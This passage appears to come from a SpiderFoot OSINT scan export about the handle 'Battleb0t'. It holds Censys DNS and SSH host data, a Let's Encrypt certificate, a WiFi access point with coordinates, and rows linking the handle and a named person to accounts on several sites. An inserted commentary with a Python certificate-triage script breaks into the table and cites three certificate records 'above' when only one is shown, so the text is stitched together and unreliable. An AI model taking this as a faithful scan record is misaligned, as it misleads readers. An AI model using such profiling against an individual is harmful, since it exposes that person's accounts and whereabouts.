{"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "mynutrition365.com": {"record_type": "AAAA", "resolved_at": "2023-01-28T13:41:29.917096426Z"}, "antiquetablesalem.com": {"record_type": "AAAA", "resolved_at": "2023-05-05T13:43:55.541214446Z"}, "theucontgi.tk": {"record_type": "AAAA", "resolved_at": "2023-04-23T21:28:34.547869491Z"}, "rockspitmarsliga.tk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:26:55.555920792Z"}, "valleyorchards.ca": {"record_type": "AAAA", "resolved_at": "2023-05-09T12:53:46.516773828Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "as2.wwbn.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:29:12.196675622Z"}, "atlantic-hearing.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T13:58:40.953790783Z"}, "mispditbobe.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:29:10.107963353Z"}, "www.progettatimobili.net.br": {"record_type": "AAAA", "resolved_at": "2023-03-26T12:54:52.310136130Z"}, "www.magulike.com": {"record_type": "CNAME", "resolved_at": "2023-05-03T20:37:49.019589614Z"}, "www.meeturplanet.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T15:22:12.227518637Z"}, "alexandrubadiu.ro": {"record_type": "AAAA", "resolved_at": "2023-05-05T20:03:40.049773053Z"}, "patconsidine.com": {"record_type": "AAAA", "resolved_at": "2023-05-01T15:09:59.045459058Z"}, "liftux.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:56:52.096682674Z"}, "www.anizm.tv": {"record_type": "AAAA", "resolved_at": "2023-05-01T20:49:32.910799070Z"}, "hessenjazz.de": {"record_type": "AAAA", "resolved_at": "2023-04-04T17:07:11.850443808Z"}, "meedsi.prinsapps.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:53:45.364969538Z"}, "wildanmaulana.cf": {"record_type": "AAAA", "resolved_at": "2023-05-04T13:01:54.678346749Z"}, "itallolik.gq": {"record_type": "AAAA", "resolved_at": 
"2023-05-09T17:19:14.126442672Z"}, "www.magulike.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:30.641844587Z"}, "ppm.amikom.id": {"record_type": "AAAA", "resolved_at": "2022-11-29T14:52:50.795015812Z"}, "naturisme-robertanne.fr": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:46:36.240542292Z"}, "centreonicinga.wwbn.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T16:18:28.593025009Z"}, "erkilgalegohlo.cf": {"record_type": "AAAA", "resolved_at": "2022-12-22T12:29:44.995025840Z"}, "www.seribusenyum.org": {"record_type": "AAAA", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "camlovers.org": {"record_type": "AAAA", "resolved_at": "2023-05-04T21:36:27.672632585Z"}, "www.proappsys.com": {"record_type": "CNAME", "resolved_at": "2023-05-04T15:48:48.652972292Z"}, "beatroulettestrategy.net": {"record_type": "AAAA", "resolved_at": "2023-05-09T18:46:48.783088104Z"}, "www.palaciorentacar.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T20:48:31.555576583Z"}, "gymnasie-portal.dk": {"record_type": "AAAA", "resolved_at": "2023-05-08T17:28:07.281800383Z"}, "celtabetgirisdestek.com": {"record_type": "AAAA", "resolved_at": "2023-04-28T14:41:36.658675345Z"}, "kmit17.com": {"record_type": "AAAA", "resolved_at": "2023-01-29T13:41:58.275178074Z"}, "congeohryverre.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:50:17.495400280Z"}, "oradfoy.tk": {"record_type": "AAAA", "resolved_at": "2023-04-18T21:32:57.447114952Z"}, "www.fopprey.com": {"record_type": "AAAA", "resolved_at": "2022-11-11T13:13:15.748303827Z"}, "bouncev2.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": "2023-05-08T12:27:03.617492048Z"}, "crabcamkanawi.ml": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:29:51.293879545Z"}, "xn--kkkenvgte-l3a6q.dk": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:07:19.955735049Z"}, "riostitelos.ga": {"record_type": "AAAA", "resolved_at": "2023-04-25T17:42:06.424778601Z"}, 
"catchhartmactaros.tk": {"record_type": "AAAA", "resolved_at": "2023-04-24T22:19:56.707459197Z"}, "topcard.com.pl": {"record_type": "AAAA", "resolved_at": "2023-05-04T21:48:11.468590186Z"}, "www.comeunity.club": {"record_type": "AAAA", "resolved_at": "2023-04-20T16:30:09.585410651Z"}, "longchampcolombia.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T15:13:12.725728600Z"}, "rezidenceaurum.cz": {"record_type": "AAAA", "resolved_at": "2023-03-11T15:26:42.690547113Z"}, "webdisk.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-05-01T12:42:56.064120059Z"}, "cpcalendars.menuin.pe": {"record_type": "AAAA", "resolved_at": "2023-03-16T07:00:36.539543312Z"}, "cdg-sex-game.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:10:46.256225534Z"}, "ftp.jogjacontemporary.net": {"record_type": "AAAA", "resolved_at": "2023-05-10T19:05:42.498201439Z"}, "cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-29T12:44:12.255784234Z"}, "shop.geminibio.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:29:06.617280204Z"}, "kola-jen.com": {"record_type": "AAAA", "resolved_at": "2022-12-01T13:36:32.553804192Z"}, "askasdkas.jkhs.ml": {"record_type": "AAAA", "resolved_at": "2023-04-24T18:46:30.034839654Z"}, "kozan.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-10T12:33:17.879735441Z"}, "observatoriodevino.com": {"record_type": "AAAA", "resolved_at": "2022-10-03T13:56:38.631534190Z"}, "cpanel.vertexhc.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T16:02:17.928893946Z"}, "ok-medicalbilling-ok.live": {"record_type": "AAAA", "resolved_at": "2023-05-01T17:47:16.990114377Z"}, "pwrcdn.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T05:41:18.589594638Z"}, "cpcalendars.diegobruno.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-06T12:35:36.066684702Z"}, "login.sanopoly.com": {"record_type": "AAAA", "resolved_at": "2023-04-22T00:18:08.415048164Z"}, "bouncefitness.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": 
"2023-02-21T12:15:56.351172926Z"}, "houseofbeauty.org.uk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:44:36.458226231Z"}, "ymfasti.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:41:20.884654729Z"}, "typearound.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:14:46.070651001Z"}, "romacerah.org": {"record_type": "AAAA", "resolved_at": "2023-05-01T02:19:33.400343679Z"}, "www.seminare-steinbergerhof.com": {"record_type": "AAAA", "resolved_at": "2022-11-05T14:24:46.885115354Z"}, "charme-des-montagnes.com": {"record_type": "AAAA", "resolved_at": "2022-12-02T09:33:27.167277863Z"}, "mail.hlb.co.za": {"record_type": "AAAA", "resolved_at": "2023-04-26T22:59:18.792128403Z"}, "growthwithsystem.be": {"record_type": "AAAA", "resolved_at": "2022-10-31T12:14:11.983652539Z"}, "profmarpdust.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:40:52.408802267Z"}, "adrdangerousgoods.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T13:16:27.339530183Z"}, "xelxican.cf": {"record_type": "AAAA", "resolved_at": "2022-10-22T12:32:56.395415126Z"}, "oliveandspicecroatia.com": {"record_type": "AAAA", "resolved_at": "2023-04-29T15:31:59.293869948Z"}, "voyrabapbo.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:30:30.625066762Z"}, "kerzcoobamabasvio.cf": {"record_type": "AAAA", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "centraldeviviendas.es": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:34:28.683222668Z"}, "www.invertsport.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-10-25T15:57:28.766154138Z"}, "myneonglow.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T15:10:52.426252771Z"}, "fowenthotatecsu.tk": {"record_type": "AAAA", "resolved_at": "2023-04-24T22:20:29.238762448Z"}, "www.thedot.cn.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-05T18:22:25.417735752Z"}, "dhff3aa.fit": {"record_type": "AAAA", "resolved_at": "2022-10-21T14:23:24.018557130Z"}, "www.sexytie.com": 
{"record_type": "AAAA", "resolved_at": "2023-05-03T15:32:31.959854869Z"}, "comprafcesssuptitog.ga": {"record_type": "AAAA", "resolved_at": "2023-05-11T17:33:53.554671898Z"}, "www.brianelstonlaw.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T14:13:06.005656367Z"}, "datenschlauch.de": {"record_type": "AAAA", "resolved_at": "2023-05-02T23:34:28.039399648Z"}}, "names": | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Gettr (Category: social) https://gettr.com/user/Altpapier | Altpapier |
| 2023-05-12 02:54:54 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2a06:98c1:3121::1 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pastebin (Category: tech) https://pastebin.com/u/Battleb0t | Battleb0t |
| 2023-05-12 02:54:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 20:07:12.002 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:85:F1:8A:49:83:21:33:60:55:2D:
99:FB:CF:EE:44:65:69:64:79:C2:61:04:D1:E4:30:AC:
C7:73:4A:13:C5:02:21:00:AC:83:C1:FC:AB:D2:CB:09:
E8:3B:57:0B:C4:10:3C:51:28:96:2A:AD:6A:76:88:D3:
6A:BA:99:2E:34:BF:39:86
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Jan 2 20:07:12.157 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:06:67:C4:B5:35:BC:02:1A:34:AD:6C:A4:
C6:E0:88:8E:0A:15:4F:7B:AF:4C:84:1D:15:95:9C:34:
C6:69:14:75:02:21:00:D6:5B:0E:91:76:65:0A:B8:EF:
EA:C9:50:39:9F:B1:18:05:1A:64:EC:3B:EF:73:22:11:
ED:D2:3B:B2:A5:63:2B
Signature Algorithm: sha256WithRSAEncryption
94:68:ec:5c:d2:7e:2d:82:58:3e:f0:cb:47:6a:10:74:ed:14:
31:55:d2:fc:07:ea:e6:b9:2b:a6:5d:fb:b0:be:2a:39:98:6e:
1b:fd:2d:97:20:dd:74:9f:d7:b0:2d:0e:14:3a:21:fd:55:19:
4d:bc:eb:97:a9:5a:64:1e:5e:ab:09:fd:8c:47:43:b4:97:96:
97:49:ac:a8:a8:ae:80:dc:40:88:24:da:62:81:70:26:c1:be:
e3:8b:70:a0:e6:b0:9f:c5:a7:45:00:28:1e:05:50:30:08:27:
e0:d5:e0:62:45:15:16:96:8c:13:de:49:ea:61:78:cb:7e:a1:
d5:93:da:97:f7:07:f3:be:42:4f:13:74:e1:ff:46:94:80:da:
f1:1d:04:f6:72:d0:2d:92:05:be:d4:04:69:d5:82:84:f9:5a:
ef:98:c5:5d:b0:27:36:45:cf:eb:71:54:9a:0d:6f:3c:49:23:
b6:9b:be:8a:ca:3c:4b:e8:78:6a:03:13:65:55:9c:8c:1b:f0:
fe:30:16:e0:6f:32:f7:3f:aa:f2:94:1e:87:e0:1f:d5:4c:32:
ca:75:84:5e:e4:d3:9f:f9:2a:a5:85:29:a3:9b:57:5a:6b:b7:
d0:02:0c:a9:a2:a4:01:0e:75:01:9b:03:39:3e:0b:d4:cf:11:
0e:ca:93:36
| battleb0t.xyz |
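The three certificate records above (kekw.battleb0t.xyz from CertSpotter, *.ayhu.xyz returned by the DNS Resolver for ayhu.xyz, and files.battleb0t.xyz from Certificate Transparency) are pasted as openssl-style text, and the export lists them without judging them. As an added example, not part of the SpiderFoot output or the tool's own code, the Python below parses that text and applies the checks a practitioner runs on CT-sourced certificates: validity against the scan's own timestamp, wildcard names, RSA key size, CN/SAN agreement, SCT count, and grouping by Authority Key Identifier to see which intermediate signed what. The sample input is a constructed trimming of the three certificates on this page (serials, moduli, signatures and log IDs dropped, since the parser never reads them); the labels `kekw`, `ayhu` and `files` are mine; the scan time is taken from the first certificate row's "Date Found" (02:44:05 on 2023-05-12, assumed UTC); the 2048-bit RSA floor and the two-SCT minimum are my policy assumptions.

```python
import re
from datetime import datetime, timezone

# Constructed sample input: the three Let's Encrypt certificates in this scan export, trimmed
# to the lines the parser reads (serials, moduli, SCT signatures and the CA signature omitted).
SCAN_EXPORT_CERTS = {
    "kekw": """\
        Issuer: C=US, O=Let's Encrypt, CN=R3
            Not Before: Mar 13 12:52:05 2023 GMT
            Not After : Jun 11 12:52:04 2023 GMT
        Subject: CN=kekw.battleb0t.xyz
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (4096 bit)
            X509v3 Authority Key Identifier:
                keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
            X509v3 Subject Alternative Name:
                DNS:kekw.battleb0t.xyz
                Signed Certificate Timestamp:
                Signed Certificate Timestamp:""",
    "ayhu": """\
        Issuer: C=US, O=Let's Encrypt, CN=E1
            Not Before: Dec 14 04:12:32 2022 GMT
            Not After : Mar 14 04:12:31 2023 GMT
        Subject: CN=*.ayhu.xyz
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
            X509v3 Authority Key Identifier:
                keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
            X509v3 Subject Alternative Name:
                DNS:*.ayhu.xyz, DNS:ayhu.xyz
                Signed Certificate Timestamp:
                Signed Certificate Timestamp:""",
    "files": """\
        Issuer: C=US, O=Let's Encrypt, CN=R3
            Not Before: Jan  2 19:07:11 2023 GMT
            Not After : Apr  2 19:07:10 2023 GMT
        Subject: CN=files.battleb0t.xyz
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (4096 bit)
            X509v3 Authority Key Identifier:
                keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
            X509v3 Subject Alternative Name:
                DNS:files.battleb0t.xyz
                Signed Certificate Timestamp:
                Signed Certificate Timestamp:""",
}
# "Date Found" of the first certificate row in the export, assumed UTC, used as the scan's reference time.
SCAN_TIME = datetime(2023, 5, 12, 2, 44, 5, tzinfo=timezone.utc)


def parse_openssl_time(s):
    """openssl prints e.g. 'Jan  2 19:07:11 2023 GMT'; collapse runs of spaces before parsing."""
    return datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Pull the triage-relevant fields out of `openssl x509 -text` style output."""
    def grab(pattern):
        m = re.search(pattern, text, re.M)
        return m.group(1).strip() if m else None
    san_line = grab(r"Subject Alternative Name:\s+(.+)$") or ""
    return {
        "subject_cn": grab(r"^\s*Subject:.*?CN=([^,\n]+)"),
        "issuer": grab(r"^\s*Issuer:\s*(.+)$"),
        "not_before": parse_openssl_time(grab(r"Not Before:\s*(.+)$")),
        "not_after": parse_openssl_time(grab(r"Not After\s*:\s*(.+)$")),
        "key_algorithm": grab(r"Public Key Algorithm:\s*(\S+)"),
        "key_bits": int(grab(r"Public-Key:\s*\((\d+) bit\)")),
        "aki": grab(r"Authority Key Identifier:\s+keyid:([0-9A-Fa-f:]+)"),
        "sans": [e.strip().split(":", 1)[1] for e in san_line.split(",") if ":" in e],
        "sct_count": len(re.findall(r"Signed Certificate Timestamp:", text)),
    }


def triage(cert, scan_time=SCAN_TIME, min_rsa_bits=2048):
    """Findings a reviewer would note for one CT-sourced certificate; the thresholds are assumptions."""
    findings = []
    if scan_time > cert["not_after"]:
        findings.append("expired before the scan: CT entry is historical, host may be gone or re-issued")
    elif scan_time < cert["not_before"]:
        findings.append("not yet valid at scan time")
    if any(n.startswith("*.") for n in cert["sans"]):
        findings.append("wildcard SAN: any host under the domain can present this key")
    if cert["key_algorithm"] == "rsaEncryption" and cert["key_bits"] < min_rsa_bits:
        findings.append(f"weak RSA key ({cert['key_bits']} bit)")
    if cert["subject_cn"] not in cert["sans"]:
        findings.append("CN absent from SAN: browsers ignore the CN, so that name is not actually served")
    if cert["sct_count"] < 2:
        findings.append("fewer than two SCTs: fails Chrome's CT policy for short-lived certificates")
    return findings


def group_by_issuer_key(certs):
    """Cluster certificates by Authority Key Identifier, i.e. by the intermediate that signed them."""
    groups = {}
    for cert in certs.values():
        groups.setdefault(cert["aki"], []).append(cert["subject_cn"])
    return groups


# Parsed once at import so the checks below can be run or asserted on directly.
PARSED = {name: parse_cert_text(text) for name, text in SCAN_EXPORT_CERTS.items()}
```

Run against the page's data, `*.ayhu.xyz` (Not After Mar 14 2023) and `files.battleb0t.xyz` (Not After Apr 2 2023) had both expired before the scan ran on May 12, so those CT entries are historical and say nothing about what the hosts serve today; only `kekw.battleb0t.xyz` was inside its validity window. The two R3-issued certificates share the AKI `14:2E:B3:17:...`, the E1-issued one has `5A:F3:ED:2B:...`, which is how you confirm the issuer line without trusting it. The regexes read the same fields from the untrimmed `openssl x509 -text` output, so the function works on the full records above unchanged.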
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom707CF8 (Net ID: 00:0C:F6:70:7C:F8) | 50.8897, 6.0563 |
| 2023-05-12 03:09:59 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | clientify.net | inbox.clientify.net |
| 2023-05-12 03:15:46 | Username | No | Account Finder | 8 | 0 | 1 | 0 | None | patrickpogoda | Patrick Pogoda |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Chess.com (Category: gaming) https://www.chess.com/member/Battleb0t | Battleb0t |
| 2023-05-12 02:53:07 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | funny.battleb0t.xyz |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, 